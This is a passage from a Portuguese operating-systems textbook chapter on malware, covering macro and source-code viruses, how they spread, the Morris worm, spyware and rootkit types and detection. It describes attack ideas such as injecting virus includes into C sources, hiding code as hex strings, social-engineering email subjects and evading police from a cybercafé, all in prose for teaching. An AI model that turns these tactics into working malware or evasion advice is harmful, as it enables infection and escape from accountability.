macros são interpretados em vez de compilados, mas 
isso afeta somente a velocidade de execução, não o que 
eles podem fazer. Como macros podem ser específicos 
de documentos, o Office os armazena para cada docu- 
mento juntamente com ele. 

Agora vem o problema. Virgil escreve um documen- 
tono Word e cria um macro que ele anexa para a função 
ABRIR ARQUIVO. O macro contém um vírus macro. 
Ele então envia por e-mail o documento para a vítima 
que naturalmente o abre (presumindo que o programa 
de e-mail já não tenha feito isso para ele). A abertura 


do documento faz com que o macro ABRIR ARQUI- 
VO execute. Como o macro pode conter um programa 
arbitrário, ele pode fazer qualquer coisa, como infectar 
outros documentos do Word, apagar arquivos e mais. 
Sejamos justos com a Microsoft: o Word dá um aviso 
quando abre um arquivo com macros, mas a maioria dos 
usuários não compreende o que isso significa e continua 
a abrir de qualquer maneira. Além disso, documentos 
legítimos também podem conter macros. E existem ou- 
tros programas que nem dão esse aviso, tornando ainda 
mais difícil detectar o vírus. 

Com o crescimento dos anexos de e-mail, enviar do- 
cumentos com vírus embutidos em macros é fácil. Tais 
vírus são muito mais fáceis de escrever do que escon- 
der o verdadeiro setor de inicialização em algum lugar 
da lista de blocos ruins, ocultar o vírus entre os vetores 
de interrupção e capturar o vetor de desvio de controle 
para chamadas de sistema. Isso significa que cada vez 
mais pessoas com pouco conhecimento de computação 
podem agora escrever vírus, baixando a qualidade ge- 
ral do produto e comprometendo a fama dos escritores 
de vírus. 


Vírus de código-fonte 


Vírus parasitas e do setor de inicialização são alta- 
mente específicos quanto à plataforma; vírus de docu- 
mentos são relativamente menos (o Word executa no 
Windows e Macs, mas não no UNIX). Os vírus mais 
portáteis de todos são os vírus de código-fonte. Imagi- 
ne o vírus da Figura 9.28, mas com a modificação que 
em vez de procurar por arquivos executáveis binários, 
ele procura por programas C, uma mudança de apenas 
1 linha (a chamada para access). O procedimento infect 
deve ser modificado para inserir a linha 


include <virus.h> 


no topo de cada programa fonte C. Uma outra inserção 
é necessária, a linha 


run virus(); 


para ativar o vírus. Decidir onde colocar essa linha exi- 
ge alguma capacidade para analisar o código C, pois ele 
precisa estar em um lugar que sintaticamente permita 
chamadas de procedimento e também não um lugar onde 
o código estaria morto (por exemplo, seguindo uma de- 
claração return). Colocá-lo no meio de um comentário 
não funciona também, e colocá-lo dentro de um laço 
pode ser um exagero. Presumindo que a chamada pode 
ser colocada adequadamente (por exemplo, um pouco 
antes do fim de main, ou antes da declaração return se 


houver alguma), quando o programa é compilado, ele 
agora contém o vírus, tirado de virus.h (embora proj.h 
atrairia menos atenção se alguém pudesse vê-lo). 

Quando o programa é executado, o vírus será cha- 
mado. Ele pode fazer qualquer coisa que quiser, por 
exemplo, procurar por outros programas C para infec- 
tar. Se encontrar um, ele pode incluir apenas as duas 
linhas dadas acima, mas isso funcionará somente na 
máquina local, onde se presume que o virus.h já tenha 
sido instalado. Para ter esse trabalho feito em uma má- 
quina remota, deve ser incluído o código-fonte comple- 
to do vírus. Isso pode ser feito incluindo o código fonte 
do vírus como uma string inicializada, preferivelmente 
como uma lista de inteiros hexadecimais de 32 bits para 
evitar que qualquer um descubra o que ele faz. Essa 
string provavelmente será ligeiramente longa, mas com 
os códigos “multimegalinhas” de hoje em dia, ele pode 
facilmente passar sem ser notado. 

Para um leitor não iniciado, todas essas maneiras 
podem parecer ligeiramente complicadas. Você poderia 
se perguntar com razão se eles poderiam funcionar na 
prática. Eles podem, acredite. Virgil é um excelente pro- 
gramador e tem muito tempo livre nas mãos. Confira o 
seu jornal local e você comprovará isso. 


Como os vírus se disseminam 


Existem vários cenários para a distribuição. Vamos 
começar com o clássico. Virgil escreve o vírus, insere-o 
em algum programa que ele escreveu (ou roubou) e co- 
meça a distribuir o programa, por exemplo, colocando- 
-o em um site como shareware. Eventualmente, alguém 
baixa o programa e o executa. Nesse ponto ha várias 
opções. Para começo de conversa, o vírus provavelmen- 
te infecta mais arquivos no disco, apenas caso a vítima 
decida compartilhar alguns desses com um amigo mais 
tarde. Ele também pode tentar infectar o setor de inicia- 
lização do disco rígido. Uma vez que o setor de iniciali- 
zação tenha sido infectado, é fácil de começar um vírus 
residente na memória modo núcleo em inicializações 
subsequentes. 

Hoje em dia, outras opções também estão disponi- 
veis para Virgil. O vírus pode ser escrito para conferir se 
a máquina infectada está ligada em uma LAN (wireless), 
algo que é muito provável. O vírus pode então começar 
a infectar arquivos desprotegidos em todas as máquinas 
conectadas à LAN. Essa infecção não será estendida aos 
arquivos protegidos, mas isso pode ser tratado fazendo 
com que os programas infectados ajam estranhamente. 
Um usuário que executa um programa desses prova- 
velmente pedirá ajuda ao administrador do sistema. 


Capítulo 9 SEGURANÇA | 465 


O administrador vai então tentar ele mesmo o estranho 
programa para ver o que está acontecendo. Se o admi- 
nistrador fizer isso enquanto ele estiver conectado como 
um superusuário, o vírus pode agora infectar os binários 
do sistema, drivers de dispositivo, sistema operacional 
e setores de inicialização. Tudo o que é preciso é um 
erro como esse e todas as máquinas na LAN estarão 
comprometidas. 

As máquinas em uma LAN da empresa muitas vezes 
têm autorização para conectar-se a máquinas remotas na 
internet ou em uma rede privada, ou mesmo autorização 
para executar comandos remotamente sem se conectar. 
Essa capacidade proporciona mais oportunidades para 
os vírus se disseminarem. Desse modo, um erro inocen- 
te pode infectar toda a empresa. Para evitar esse cená- 
rio, todas as empresas deveriam ter uma política geral 
dizendo aos administradores para jamais cometer erros. 

Outra maneira para disseminar um vírus é postar um 
programa infectado em um grupo de notícias USENET 
(isto é, Google) ou site para os quais os programas são 
regularmente postados. Também é possível criar uma 
página na web que exija um plug-in de navegador es- 
pecial para ver, e então certificar-se de que os plug-ins 
estejam infectados. 

Um ataque diferente é infectar um documento e en- 
tão enviá-lo por e-mail para muitas pessoas ou trans- 
miti-lo para uma lista de mailing ou grupo de notícias 
USENET, normalmente como um anexo. Mesmo pes- 
soas que jamais sonhariam em executar um programa 
que algum estranho enviou poderiam não se dar con- 
ta de que clicar em um anexo para abri-lo pode liberar 
um vírus em sua máquina. Para piorar as coisas, o vírus 
pode então procurar pela lista de endereços do usuário e 
então enviar mensagens para todos nessa lista, em geral 
com uma linha de Assunto que parece legítima ou inte- 
ressante, como 


Assunto: Mudança de planos 

Assunto: Re: aquele último e-mail 

Assunto: O cachorro morreu na noite passada 
Assunto: Estou seriamente doente 

Assunto: Eu te amo 


Quando o e-mail chega, o receptor vê que o emissor 
é um amigo ou colega, e então não suspeita de proble- 
mas. Assim que o e-mail for aberto, será tarde demais. 
O vírus “EU TE AMO” que se disseminou mundo afora 
em junho de 2000 funcionou dessa maneira e causou 
bilhões de dólares de prejuízo. 

De certa maneira relacionada à disseminação real 
dos vírus ativos é a disseminação da tecnologia dos 
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vírus. Há grupos de escritores de vírus que se comu- 
nicam ativamente através de internet e ajudam um ao 
outro a desenvolver novas tecnologias, ferramentas e 
vírus. A maioria deles provavelmente é amadora em vez 
de criminosos de carreira, mas os efeitos podem ser da 
mesma maneira devastadores. Outra categoria de escri- 
tores de vírus é a militar, que vê os vírus como uma 
arma de guerra potencialmente capaz de desabilitar os 
computadores do inimigo. 

Outra questão relacionada à disseminação dos vírus 
é evitar a detecção. Cadeias têm instalações de compu- 
tação notoriamente ruins, então Virgil preferiria evitá- 
-las. Postar um vírus de sua maquina de casa não é uma 
ideia inteligente. Se o ataque for bem-sucedido, a poli- 
cia pode rastreá-lo procurando pela mensagem de vírus 
com a menor data-horário, pois essa é provavelmente a 
mais próxima da fonte do ataque. 

A fim de minimizar a sua exposição, Virgil poderia 
ir a um cybercafé em uma cidade distante e conectar-se 
ali. Ele pode levar o vírus em um pen-drive e lê-lo, ou 
se as máquinas não tiverem portas USB, pedir para a 
simpática jovem na mesa para por favor ler o arquivo 
book.doc de maneira que ele possa imprimi-lo. Uma vez 
no disco rígido, ele renomeia o arquivo virus.exe e o 
executa, infectando toda a LAN com um vírus que dis- 
para um mês depois, apenas caso a polícia decida pedir 
às companhias aéreas por uma lista de todas as pessoas 
que voaram até ali naquela semana. 

Uma alternativa é esquecer o pen-drive e buscar o 
vírus de um site FTP ou na web remota. Ou trazer um 
notebook e conectá-lo a uma porta da Ethernet que o 
cybercafé providencialmente proporcionou para os tu- 
ristas com seus notebooks e que querem ler seus e-mails 
todos os dias. Uma vez conectado à LAN, Virgil pode 
partir para infectar todas as máquinas nela. 

Há muito mais a ser dito sobre os vírus. Em parti- 
cular, como eles tentam esconder-se e como o software 
antivírus tenta expulsá-los. Eles podem até esconder-se 
dentro de animais vivos — mesmo — ver Rieback et 
al. (2006). Voltaremos a esses tópicos quando entrarmos 
nas defesas contra malwares mais tarde neste capítulo. 


9.9.3 Vermes (worms) 


A primeira violação de computadores da internet em 
grande escala começou na noite de 2 de novembro de 
1988, quando um estudante formado pela Universidade 
de Cornell, Robert Tappan Morris, liberou um programa 
de verme na internet. Essa ação derrubou milhares de 
computadores em universidades, corporações e labora- 
tórios do governo mundo afora antes de ser rastreado 


e removido. Ele também começou uma controvérsia 
que ainda não acabou. Discutiremos os pontos mais im- 
portantes desse evento a seguir. Para mais informações 
técnicas, ver o estudo de Spafford et al. (1989). Para a 
história vista como um thriller policial, ver o livro de 
Hafner e Markoff (1991). 

A história começou em algum momento em 1988, 
quando Morris descobriu dois defeitos no UNIX de 
Berkeley que tornavam possível ganhar acesso não au- 
torizado a máquinas por toda a internet. Como veremos, 
um deles era o transbordamento de buffer. Trabalhando 
sozinho, ele escreveu um programa que se autorreplica- 
va, chamado verme, que exploraria esses erros e repli- 
caria a si mesmo em segundos em toda máquina que ele 
pudesse ganhar acesso. Ele trabalhou no programa por 
meses, cuidadosamente aperfeiçoando-o e fazendo com 
que ocultasse suas pistas. 

Não se sabe se a liberação em 2 de novembro de 
1988 tinha a intenção de ser um teste, ou era para valer. 
De qualquer maneira, ele derrubou a maior parte dos 
sistemas Sun e VAX na internet em poucas horas após 
a sua liberação. A motivação de Morris é desconhecida, 
mas é possível que visse toda a ideia como uma piada 
prática de alta tecnologia e que por causa de um erro de 
programação saiu completamente do seu controle. 

Tecnicamente, o verme consistia em dois programas, 
o iniciador (bootstrap) e o verme propriamente dito. O 
iniciador tinha 99 linhas de C e chamado /7.c. Ele era 
compilado e executado no sistema que estava sendo ata- 
cado. Uma vez executando, ele conectava-se à máquina 
da qual ele viera, carregava o verme principal e o exe- 
cutava. Após passar por algumas dificuldades para es- 
conder sua existência, o verme então olhava através das 
tabelas de roteamento do seu novo hospedeiro para ver 
a quais máquinas aquele hospedeiro estava conectado e 
tentava disseminar o iniciador para essas máquinas. 

Três métodos eram tentados para infectar as má- 
quinas novas. O método 1 era tentar executar um shell 
remoto usando o comando rsh. Algumas máquinas con- 
fiam em outras, e apenas executam rsh sem qualquer 
outra autenticação. Se isso funcionasse, o shell remoto 
transferia o programa do verme e continuava a infectar 
novas máquinas a partir dali. 

O método 2 fez uso de um programa presente em to- 
dos os sistemas UNIX chamado finger, que permite que 
um usuário em qualquer parte na internet digite 


finger nome O site 


para exibir informações sobre uma pessoa em uma ins- 
talação em particular. Essa informação normalmente 
incluía o nome real da pessoa, login, endereços de casa 


e do trabalho, e números de telefone, nome da secretá- 
ria e número de telefone, número de FAX e informa- 
ções similares. É o equivalente eletrônico de uma lista 
telefônica. 

O finger funcionou da seguinte forma. Em cada 
máquina UNIX, um processo de segundo plano, cha- 
mado daemon finger, executou toda vez que alguma 
consulta era recebida ou respondida por toda a internet. 
O que o verme fez foi chamar finger com uma string de 
536 bytes feita sob medida como parâmetro. Essa lon- 
ga string transbordou o buffer do daemon e sobrescre- 
veu sua pilha, da maneira mostrada na Figura 9.21(c). 
O defeito explorado pelo verme aqui foi a falha do 
daemon em verificar o transbordamento. Quando o dae- 
mon retornou do procedimento era chegada a hora de 
obter o que ele havia solicitado, então ele não voltou 
para o main, mas sim para um procedimento dentro da 
string de 536 bytes na pilha. Esse procedimento tentava 
executar sh. Se ele funcionasse, o verme teria agora um 
shell executando na máquina sendo atacada. 

O método 3 dependia de um defeito no sistema de 
correio eletrônico, sendmail, que permitia que o verme 
enviasse uma cópia do iniciador e fosse executado. 

Uma vez estabelecido, o verme tentava quebrar as 
senhas de usuários. Morris não tinha como fazer muita 
pesquisa para saber como conseguir isso. Tudo o que 
ele precisou fazer foi pedir para o seu pai, um especia- 
lista em segurança na Agência de Segurança Nacional, 
a agência do governo norte-americano que decifra có- 
digos, uma reimpressão de um estudo clássico sobre o 
assunto que Morris Sr. e Ken Thompson haviam escrito 
uma década antes no Bell Labs (MORRIS e THOMP- 
SON, 1979). Cada senha quebrada permitia que o ver- 
me se conectasse a qualquer máquina que o proprietário 
da senha tivesse conta. 

Toda vez que o verme ganhava acesso a uma nova 
máquina, ele primeiro conferia para ver se alguma ou- 
tra cópia do verme já estava ativa ali. Se afirmativo, a 
nova cópia saía, exceto uma vez em sete ela continuava, 
possivelmente em uma tentativa de manter o verme se 
propagando mesmo que o administrador ali começasse 
a sua própria versão do verme para enganar o verme de 
verdade. O uso de um em sete criou um número grande 
demais de vermes, e essa foi a razão pela qual todas as 
máquinas infectadas foram derrubadas: elas estavam in- 
festadas com vermes. Se Morris tivesse deixado isso de 
fora e simplesmente saído sempre que outro verme fosse 
visto (ou programado para um em 50) o verme provavel- 
mente passaria desapercebido. 

Morris foi pego quando um dos seus amigos falou 
com o repórter de ciências do New York Times, John 
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Markoff, e tentou convencê-lo de que o incidente fora 
um acidente, o verme era inofensivo e o autor sentia 
muito. O amigo inadvertidamente deixou escapar que 
o login do atacante era rtm. Converter rtm para o nome 
do proprietário foi fácil — tudo o que Markoff tinha de 
fazer era executar finger. No dia seguinte a história era 
manchete na página um, superando até mesmo a eleição 
presidencial que ocorreria em três dias. 

Morris foi julgado e condenado em um tribunal fe- 
deral. Ele foi condenado a uma pena de US$ 10.000, 
três anos de liberdade condicional e 400 horas de ser- 
viço comunitário. Suas custas legais provavelmente 
passaram dos US$ 150.000. Essa sentença gerou mui- 
ta controvérsia. Muitos na comunidade da computação 
achavam que ele era um estudante brilhante cuja brin- 
cadeira inofensiva havia saído do seu controle. Nada no 
verme sugeria que Morris estivesse tentando roubar ou 
danificar nada. Outros achavam que ele era um crimino- 
so de verdade e que deveria ter ido para a cadeia. Mor- 
ris mais tarde conseguiu seu doutorado por Harvard e é 
agora professor no M.L.T. 

Um efeito permanente desse incidente foi o estabe- 
lecimento da CERT (Computer Emergency Response 
Team — Equipe de resposta a emergências computacio- 
nais), que oferece um local centralizado para denunciar 
tentativas de invasões e um grupo de especialistas para 
analisar problemas de segurança e projetar soluções. 
Embora essa medida tenha sido certamente um passo à 
frente, ela também tem seu lado negativo. ACERT coleta 
informações sobre falhas de sistema que podem ser ata- 
cadas e como consertá-las. Por necessidade, ela circula 
essa informação amplamente para milhares de adminis- 
tradores de sistemas na internet. Infelizmente, os caras 
maus (possivelmente passando-se por administradores 
de sistemas) talvez também sejam capazes de conseguir 
relatórios sobre defeitos e explorar as brechas nas horas 
(ou mesmo dias) antes que elas sejam fechadas. 

Uma série de outros vermes foi lançada desde o ver- 
me de Morris. Eles operam ao longo das mesmas linhas 
que o verme de Morris, apenas explorando defeitos di- 
ferentes em outros softwares. Eles tendem a se espalhar 
muito mais rápido do que os vírus pois se movimentam 
sozinhos. 


9.9.4 Spyware 


Um tipo cada vez mais comum de malware é o 
spyware. De maneira simplificada, spyware é um soft- 
ware que, carregado sorrateiramente no PC sem o co- 
nhecimento do dono, executa no segundo plano fazendo 
coisas por trás das costas do proprietário. Defini-lo, no 
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entanto, é supreendentemente difícil. Por exemplo, a 
atualização do Windows baixa automaticamente exten- 
sões de segurança para o Windows sem que os proprie- 
tários tenham consciência disso. Similarmente, muitos 
programas antivírus atualizam-se automática e silencio- 
samente no segundo plano. Nenhum deles é conside- 
rado um spyware. Se Potter Stewart estivesse vivo, ele 
provavelmente diria: “Não consigo definir um spyware, 
mas sei quando vejo um.”! 

Outros tentaram com mais afinco defini-lo (o spywa- 
re, não a pornografia). Barwinski et al. (2006) disse- 
ram que ele tem quatro características. Primeiro, ele se 
esconde, de maneira que a vítima não pode encontrá- 
-lo facilmente. Segundo, ele coleta dados a respeito do 
usuário (sites visitados, senhas, até mesmo números de 
cartões de crédito). Terceiro, ele comunica a informação 
coletada de volta para seu mestre distante. E quarto, ele 
tenta sobreviver a determinadas tentativas para removê- 
-lo. Adicionalmente, alguns spywares mudam as confi- 
gurações e desempenham outras atividades maliciosas e 
perturbadoras como descrito a seguir. 

Barwinski et al. dividiram o spyware em três amplas 
categorias. A primeira é marketing: o spyware simples- 
mente coleta informações e as envia de volta para seu 
mestre, normalmente para melhor direcionamento da 
propaganda para máquinas específicas. A segunda cate- 
goria é a vigilância, em que empresas intencionalmente 
colocam spywares em máquinas dos empregados para 
rastrear o que eles estão fazendo e quais sites eles estão 
visitando. A terceira aproxima-se do malware clássico, 
em que a máquina infectada torna-se parte de um exér- 
cito zumbi esperando por seu mestre para dar a ela suas 
ordens de marcha. 

Eles executaram um experimento para ver quais ti- 
pos de sites contêm spyware visitando 5.000 sites. Eles 
observaram que os principais fornecedores de spywares 
são sites relacionados ao entretenimento adulto, progra- 
mas piratas, viagens on-line e negócios imobiliários. 

Um estudo muito maior foi feito na Universidade 
de Washington (MOSHCHUK et al., 2006). No estudo 
na UW, em torno de 18 milhões de URLs foram inspe- 
cionados e foram encontrados quase 6% com spywa- 
res. Desse modo, não causa surpresa que em um estudo 
pela AOL/NCSA que eles citam, 80% dos computado- 
res domésticos inspecionados estavam infestados com 
spyware, com uma média de 93 fragmentos de spyware 
por computador. O estudo da UW encontrou que os si- 
tes adultos, de celebridades e de ofertas de wallpapers 





(imagens para o fundo de telas) tinham os maiores in- 
dices de infecção, mas eles não examinaram os sites de 
viagens e negócios imobiliários. 


Como o spyware se espalha 


A próxima questão óbvia é: “Como um computador 
se infecta com spy ware?”. Uma maneira é a mesma que 
com qualquer malware: por um cavalo de Troia. Uma 
quantidade considerável de softwares livres contém 
spyware, com o autor do software ganhando dinheiro 
por meio do spyware. Softwares de compartilhamento 
de arquivos peer-to-peer (por exemplo, Kazaa) estão lo- 
tados de spywares. Também, muitos sites exibem anún- 
cios em banners que direcionam os navegadores para 
páginas na web infestadas de spywares. 

A outra rota de infecção importante é muitas vezes 
chamada de contágio por contato. É possível pegar 
um spyware (na realidade, qualquer malware) apenas 
visitando uma página na web infectada. Existem três 
variantes da tecnologia de infecção. Primeiro, a página 
na web pode redirecionar o navegador para um arquivo 
(.exe) executável. Quando o navegador vê o arquivo, ele 
abre uma caixa de diálogo perguntando ao usuário se ele 
quer executar ou salvar o programa. Como downloads 
legítimos usam o mesmo mecanismo, a maioria dos 
usuários simplesmente clica em EXECUTAR, que faz 
com que o navegador baixe e execute o software. A essa 
altura, a máquina está infectada e o spyware está livre 
para fazer o que quiser. 

A segunda rota comum é a barra de ferramentas in- 
fectada. Tanto o Internet Explorer quanto o Firefox dão 
suporte a barras de ferramentas de terceiros. Alguns es- 
critores de spyware criam uma bela barra de ferramen- 
tas com algumas características úteis e então fazem uma 
grande propaganda delas como um excelente módulo 
gratuito. As pessoas que instalam a barra de ferramentas 
pegam o spyware. A popular barra de ferramentas Ale- 
xa contém spywares, por exemplo. Em essência, esse 
esquema é um cavalo de Troia, apenas empacotado de 
maneira diferente. 

A terceira variante de infecção é mais óbvia. Muitas 
páginas da web usam uma tecnologia da Microsoft cha- 
mada controles activeX. Esses controles são programas 
binários x86 que se conectam ao Internet Explorer (IE) 
e estendem sua funcionalidade, por exemplo, na inter- 
pretação especial de páginas da web de imagens, áudios 
ou vídeos. Em princípio, essa tecnologia é legítima. 


1 Stewart foi um juiz da Suprema Corte norte-americana que certa feita escreveu uma opinião sobre um caso envolvendo pornografia na 
qual ele admitia ser incapaz de definir pornografia, mas acrescentou: “mas a reconheço quando a vejo”. (N. do A.) 


Na prática, eles são perigosos. Essa abordagem sempre 
tem como alvo o IE, jamais Firefox, Chrome, Safari, ou 
outros navegadores. 

Quando uma página com um controle activeX é vi- 
sitada, o que acontece depende das configurações de 
segurança do IE. Se elas são configuradas muito bai- 
xas, O spyware é automaticamente baixado e instalado. 
A razão por que as pessoas estabelecem as configura- 
ções de segurança baixas é que, quando elas são estabe- 
lecidas altas, muitos sites não são exibidos corretamente 
(ou nem chegam a sê-lo), ou o IE fica constantemente 
pedindo permissão para isso e aquilo, nada do qual o 
usuário compreende. 

Agora suponha que o usuário tenha suas configura- 
ções de segurança relativamente altas. Quando uma pá- 
gina na web é visitada, o IE detecta o controle activeX e 
abre uma caixa de diálogo que contém uma mensagem 
fornecida pela página da web. Ela pode dizer 


Você gostaria de instalar e executar um programa 
que vá acelerar o seu acesso à internet? 


A maioria das pessoas vai achar que essa é uma boa 
ideia e clica SIM. Bingo. Já era. Usuários sofisticados 
talvez confiram o resto da caixa de diálogo, onde eles 
encontrarão outros dois itens. Um é um link para o certi- 
ficado da página da web (como discutido na Seção 9.5) 
fornecido por alguma autoridade certificadora (AC) de 
que eles nunca ouviram falar e que não contém infor- 
mações úteis fora o fato de que a AC assegura que a 
empresa existe e tem dinheiro suficiente para pagar pelo 
certificado. O outro é um hyperlink para uma página di- 
ferente na web fornecida por aquela sendo visitada. Ela 
supostamente explica o que o controle activeX faz, mas, 
na realidade, pode ser a respeito de nada e geralmente 
explica quão maravilhoso é o controle activeX e como 
ele melhorará a sua experiência de navegação. Armados 
com essa informação falsa, mesmo usuários sofistica- 
dos muitas vezes clicam em SIM. 

Se eles clicarem NÃO, muitas vezes um script na 
página da web se aproveita de um defeito no IE para 
tentar baixar o spyware de qualquer maneira. Se ne- 
nhum defeito estiver disponível para explorar, ele talvez 
simplesmente tente baixar o controle activeX sempre de 
novo, cada vez fazendo com que o IE exiba a mesma 
caixa de diálogo. A maioria das pessoas não sabe o que 
fazer a essa altura (ir ao gerenciador de tarefas e fechar 
o IE), então elas por fim desistem e clicam SIM. Bingo 
de novo. 

Muitas vezes o que acontece é que o spyware exibe 
uma licença de 20-30 páginas escritas em uma lingua- 
gem que seria familiar a Geoffrey Chaucer, mas não a 
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ninguém após ele que seja de fora da área de direito. 
Uma vez que o usuário tenha aceitado a licença, ele 
pode perder o seu direito de processar o vendedor de 
spyware porque ele acabou de concordar em deixar 
o spyware executar por conta, embora às vezes as leis 
locais se sobrepõem a essas licenças. (Se uma licença 
diz “Por meio desta, o licenciado concede o direito irre- 
vogável de o licenciador matar a sua mãe e reivindicar 
a sua herança”, o licenciador pode tentar convencer os 
tribunais quando chegar o momento de receber a heran- 
ça, apesar da concordância do licenciado.) 


Ações executadas pelo spyware 


Agora vamos examinar o que o spyware geralmente 
faz. Todos os itens na lista a seguir são comuns. 


1. Alterar a página inicial do navegador. 

2. Modificar a lista de páginas favoritas (marcadas) 

do navegador. 

3. Acrescentar novas barras de ferramentas para o 

navegador. 

4. Alterar o player de mídia padrão do usuário. 

5. Alterar o buscador padrão do usuário. 

6. Adicionar novos ícones à área de trabalho do 

Windows. 

7. Substituir anúncios de banners em páginas na 

web por aqueles escolhidos pelo spyware. 

8. Colocar anúncios nas caixas de diálogo padrão 

do Windows. 

9. Gerar um fluxo contínuo e imparável de anúncios 

pop-up. 

Os primeiros três itens mudam o comportamento do 
navegador, normalmente de tal maneira que mesmo rei- 
nicializar o sistema não restaura os valores anteriores. 
Esse ataque é conhecido como um leve sequestro de 
navegador (leve, porque existem sequestros ainda pio- 
res). Os dois itens seguintes mudam as configurações 
no registro do Windows, desviando o usuário inocente 
para um player de mídia diferente (que exibe os anún- 
cios que o spyware quer) e uma ferramenta de busca 
diferente (que retorna sites que o spyware quer). Acres- 
centar ícones ao desktop é uma tentativa óbvia de fazer 
com que o usuário execute um software recentemente 
instalado. Substituir anúncios de banners (imagens .gifde 
468 x 60) em páginas da web subsequentes faz parecer 
que todas as páginas da web visitadas estão anunciando 
os sites que o spyware escolhe. Mas é o último item que 
mais incomoda: um anúncio pop-up que pode ser fecha- 
do, mas que gera outro anúncio pop-up imediatamente 
ad infinitum sem ter como pará-los. Adicionalmente, o 
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spyware às vezes desabilita o firewall, remove spywares 
rivais e leva adiante outras ações maliciosas. 

Muitos programas de spyware vêm com desinstala- 
dores, mas eles raramente funcionam, de maneira que 
usuários inexperientes não têm como remover o spyware. 
Felizmente, uma nova indústria de softwares antispyware 
está sendo criada e empresas antivírus existentes estão 
entrando nesse campo também. Ainda assim, a linha se- 
parando programas legítimos de spywares não é muito 
clara. 

Spyware não deve ser confundido com adware, no 
qual vendedores de softwares legítimos (mas pequenos) 
oferecem duas versões do seu produto: uma gratuita 
com anúncios e uma paga sem anúncios. Essas empre- 
sas deixam a questão muito clara a respeito da existên- 
cia das duas versões e sempre oferecem aos usuários a 
opção de fazer um upgrade para a versão paga para se 
livrar dos anúncios. 


9.9.5 Rootkits 


Um rootkit é um programa ou conjunto de progra- 
mas e arquivos que tenta ocultar sua existência, mesmo 
diante de esforços determinados pelo proprietário da 
máquina infectada de localizá-lo e removê-lo. Normal- 
mente, o rootkit contém algum malware que está sendo 
escondido também. Rootkits podem ser instalados por 
qualquer um dos métodos discutidos até o momento, 
incluindo vírus, vermes e spywares, assim como por 
outros meios, um dos quais será discutido mais tarde. 


Tipos de rootkits 


Vamos agora discutir os cinco tipos de rootkits dis- 
poníveis atualmente, de cima para baixo. Em todos os 
casos, a questão é: onde o rootkit se esconde? 


1. Rootkits de firmware. Na teoria, pelo menos, 
um rootkit poderia esconder-se instalando na 
BIOS uma cópia de si mesmo. Ele assumiria o 
controle sempre que a máquina fosse inicializada 
e também sempre que uma função da BIOS fosse 
chamada. Se o rootkit criptografasse a si mesmo 
após cada uso e decriptografasse antes de cada 
uso, seria muito difícil de detectá-lo. Esse tipo 
ainda não foi observado. 

2. Rootkits de hipervisor. Um tipo extremamen- 
te furtivo de rootkit poderia executar o sistema 
operacional inteiro e todas as aplicações em 
uma máquina virtual sob o seu controle. A pri- 
meira prova desse conceito, a blue pill (uma 


referência ao filme Matrix), foi demonstra- 
da por uma hacker polonesa chamada Joanna 
Rutkowska em 2006. Esse tipo normalmente 
modifica a sequência de inicialização de manei- 
ra que, quando a máquina é ligada, ela executa 
o hipervisor sem sistema operacional, que en- 
tão inicializa o sistema operacional e suas apli- 
cações em uma máquina virtual. A força desse 
método, como o anterior, é que nada é escondi- 
do no sistema operacional, bibliotecas ou pro- 
gramas, de maneira que os detectores de rootkit 
que procuram ali nada encontram. 

3. Rootkits de núcleo. O tipo mais comum de 
rootkit no momento é um que infecta o sistema 
operacional e o esconde como um driver de dis- 
positivo ou módulo de núcleo carregável. O root- 
kit pode facilmente substituir um driver grande, 
complexo e frequentemente em mudança por um 
novo que contém o antigo mais o rootkit. 

4. Rootkits de biblioteca. Outro lugar em que um 
rootkit pode se esconder é a biblioteca de siste- 
ma, por exemplo, na /ibc no Linux. Esse local 
dá ao malware a oportunidade de inspecionar os 
argumentos e retornar valores de chamadas de 
sistema, modificando-as conforme a necessidade 
para manter-se escondido. 

5. Rootkits de aplicação. Outro lugar para escon- 
der um rootkit é dentro de um grande programa 
de aplicação, especialmente um que crie muitos 
novos arquivos enquanto executando (perfis de 
usuário, pré-visualizações de imagens etc.). Esses 
novos arquivos são bons lugares para se esconder 
coisas, e ninguém acha estranho que eles existam. 


Os cinco lugares em que rootkits podem se esconder 
estão ilustrados na Figura 9.31. 


Detecção de rootkit 


Rootkits são difíceis de detectar quando o hardware, 
o sistema operacional, as bibliotecas e as aplicações 
não podem ser confiáveis. Por exemplo, uma maneira 
de olhar para um rootkit é fazer listagens de todos os 
arquivos no disco. No entanto, a chamada de sistema 
que lê um diretório, o procedimento que chama a cha- 
mada de sistema e o programa que realiza a listagem são 
todos potencialmente maliciosos e podem censurar os 
resultados, omitindo quaisquer arquivos relacionados 
ao rootkit. Mesmo assim, a situação não está perdida, 
como descrito a seguir. 

Detectar um rootkit que inicializa o seu próprio hi- 
pervisor e então executa o sistema operacional e todas 


[FIGURA 9.31] Cinco lugares onde um rootkit pode se esconder. 
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as aplicações em uma maquina virtual sob o seu contro- 
le é complicado, mas não impossível. Ele exige olhar 
cuidadosamente por discrepâncias menores no desem- 
penho e funcionalidade entre uma máquina virtual e 
uma real. Garfinkel et al. (2007) sugeriu várias delas, 
como descrito a seguir. Carpenter et al. (2007) também 
discute esse assunto. 

Uma classe inteira de métodos de detecção baseia- 
-se no fato de que o próprio hipervisor usa recursos 
físicos, e a perda desses recursos pode ser detectada. 
Por exemplo, o hipervisor em si precisa usar algumas 
entradas TLB, competindo com a máquina virtual por 
esses recursos escassos. Um programa de detecção po- 
deria colocar pressão na TLB, observar o desempenho e 
compará-lo a um desempenho previamente mensurado 
no hardware sem sistema operacional. 

Outra classe de métodos de detecção relaciona-se ao 
timing, especialmente de dispositivos de E/S virtualiza- 
dos. Suponha que ele leve 100 ciclos de relógio para ler 
algum registrador de dispositivo PCI na máquina real e 
esse tempo é altamente reproduzível. Em um ambien- 
te virtual, o valor desse registrador vem da memória, e 
seu tempo de leitura depende se ele está na cache nível 
1 da CPU, cache nível 2, ou RAM real. Um programa 
de detecção poderia facilmente forçá-lo a mover-se de 
um lado para o outro entre esses estados e mensurar a 
variabilidade em tempos de leitura. Observe que é a va- 
riabilidade que importa, não o tempo de leitura. 

Outra área que pode ser sondada é o tempo que leva 
para executar instruções privilegiadas, especialmente 
aquelas que exigem apenas alguns ciclos de relógio no 
hardware real e centenas ou milhares de ciclos de reló- 
gio quando eles devem ser emulados. Por exemplo, se 
a leitura de algum registrador de CPU protegido leva 
1 ns no hardware real, não há como um bilhão de chave- 
amentos e emulações possam ser feitos em 1 segundo. 
É claro, o hipervisor pode trapacear divulgando um 


tempo emulado em vez do tempo real em todas as cha- 
madas de sistema envolvendo o tempo. O detector pode 
driblar o tempo emulado conectando-se a uma máquina 
